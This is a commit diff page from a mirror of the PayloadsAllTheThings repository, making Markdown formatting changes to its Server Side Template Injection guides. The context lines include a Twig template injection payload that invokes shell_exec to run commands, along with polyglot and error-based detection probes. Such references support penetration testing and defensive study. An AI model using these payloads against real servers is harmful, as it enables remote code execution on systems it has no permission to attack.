gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2026-03-12 21:22:59 -07:00
Code Issues Packages Projects Releases Wiki Activity

SSI, SSTI:

Browse Source 
- Improved MarkDown
This commit is contained in:
vladko312
2026-01-03 22:20:19 +03:00
parent 4831e36fb8
commit 09a5f07345
4 changed files with 9 additions and 8 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
Server Side Template Injection/Java.md
View File

@@ -54,7 +54,7 @@
### Java EL - Basic Injection
> Java has multiple Expression Languages using similar syntax.
Java has multiple Expression Languages using similar syntax.
> Multiple variable expressions can be used, if `${...}` doesn't work try `#{...}`, `*{...}`, `@{...}` or `~{...}`.

1
Server Side Template Injection/PHP.md
View File

@@ -167,6 +167,7 @@ $output = $twig > render (
```
With certain settings, Twig interrupts rendering, if any errors or warnings are raised. This payload works fine in these cases:
```php
{{ {'id':'shell_exec'}|map('call_user_func')|join }}
```

12
Server Side Template Injection/README.md
View File

@@ -53,9 +53,9 @@
Original research:
- Rendered, Time-Based: [Server-Side Template Injection: RCE For The Modern Web App - James Kettle - August 05, 2015](https://portswigger.net/knowledgebase/papers/serversidetemplateinjection.pdf)
- Polyglot-Based: [Improving the Detection and Identification of Template Engines for Large-Scale Template Injection Scanning - Maximilian Hildebrand - September 19, 2023](https://www.hackmanit.de/images/download/thesis/Improving-the-Detection-and-Identification-of-Template-Engines-for-Large-Scale-Template-Injection-Scanning-Maximilian-Hildebrand-Master-Thesis-Hackmanit.pdf)
- Error-Based, Boolean-Based: [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
* Rendered, Time-Based: [Server-Side Template Injection: RCE For The Modern Web App - James Kettle - August 05, 2015](https://portswigger.net/knowledgebase/papers/serversidetemplateinjection.pdf)
* Polyglot-Based: [Improving the Detection and Identification of Template Engines for Large-Scale Template Injection Scanning - Maximilian Hildebrand - September 19, 2023](https://www.hackmanit.de/images/download/thesis/Improving-the-Detection-and-Identification-of-Template-Engines-for-Large-Scale-Template-Injection-Scanning-Maximilian-Hildebrand-Master-Thesis-Hackmanit.pdf)
* Error-Based, Boolean-Based: [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
#### Rendered
@@ -117,7 +117,7 @@ ${{<%[%'"}}%\.
Common tags to test for SSTI with code evaluation:
```
```powershell
{{ ... }}
${ ... }
#{ ... }
@@ -133,13 +133,13 @@ ${ ... }
Rendered SSTI can be checked by using mathematical expressions inside the tags:
```
```powershell
7 * 7
```
Error-Based SSTI can be checked by using this payload inside the tags:
```
```powershell
(1/0).zxy.zxy
```